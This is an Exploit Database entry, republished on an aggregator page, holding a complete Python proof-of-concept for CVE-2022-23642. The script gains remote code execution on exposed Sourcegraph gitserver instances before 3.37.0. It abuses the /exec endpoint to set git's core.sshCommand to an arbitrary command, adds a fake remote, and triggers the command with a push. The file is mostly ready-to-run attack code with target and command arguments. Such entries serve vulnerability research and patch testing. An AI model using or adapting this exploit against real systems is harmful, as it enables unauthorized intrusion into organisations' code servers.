Sourcegraph Gitserver 3.36.3 – Remote Code Execution (RCE)

• Exploit Database
• 133 阅读

• 作者： Altelus
  日期： 2022-06-14
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50964/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87

  # Exploit Title: Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE) # Date: 2022-06-10 # Exploit Author: Altelus # Vendor Homepage: https://about.sourcegraph.com/ # Version: 3.63.3 # Tested on: Linux # CVE : CVE-2022-23642 # Docker Container: sourcegraph/server:3.36.3   # Sourcegraph prior to 3.37.0 has a remote code execution vulnerability on its gitserver service. # This is due to lack of restriction on git config execution thus "core.sshCommand" can be passed # on the HTTP arguments which can contain arbitrary bash commands. Note that this is only possible # if gitserver is exposed to the attacker. This is tested on Sourcegraph 3.36.3 # # Exploitation parameters: # - Exposed Sourcegraph gitserver # - Existing repo on sourcegraph       import json import argparse import requests   def exploit(host, existing_git, cmd):   # setting sshCommand data = { "Repo" : existing_git, "Args" : [ "config", "core.sshCommand", cmd ] }   res = requests.get(host+"/exec", json=data).text   if len(res) > 0: print("[-] Didn't work: {}".format(res)) exit(0)   # setting fake origin data = { "Repo" : existing_git, "Args" : [ "remote", "add", "origin", "git@lolololz:foo/bar.git" ] }   res = requests.get(host+"/exec", json=data).text   if len(res) > 0: print("[-] Didn't work: {}".format(res)) exit(0)   # triggering command using push data = { "Repo" : existing_git, "Args" : [ "push", "origin", "master" ] }   res = requests.get(host+"/exec", json=data).text   print("[*] Finished executing exploit")   parser = argparse.ArgumentParser()   parser.add_argument('--gitserver-host', required=True, help="Target Sourcegraph Gitserver Host") parser.add_argument('--existing-git', required=True, help="e.g. Link of existing repository in target Sourcegraph") parser.add_argument('--cmd', required=True, help="Command to run") args = parser.parse_args()   host = args.gitserver_host existing_git = args.existing_git cmd = args.cmd     exploit(host, existing_git, cmd)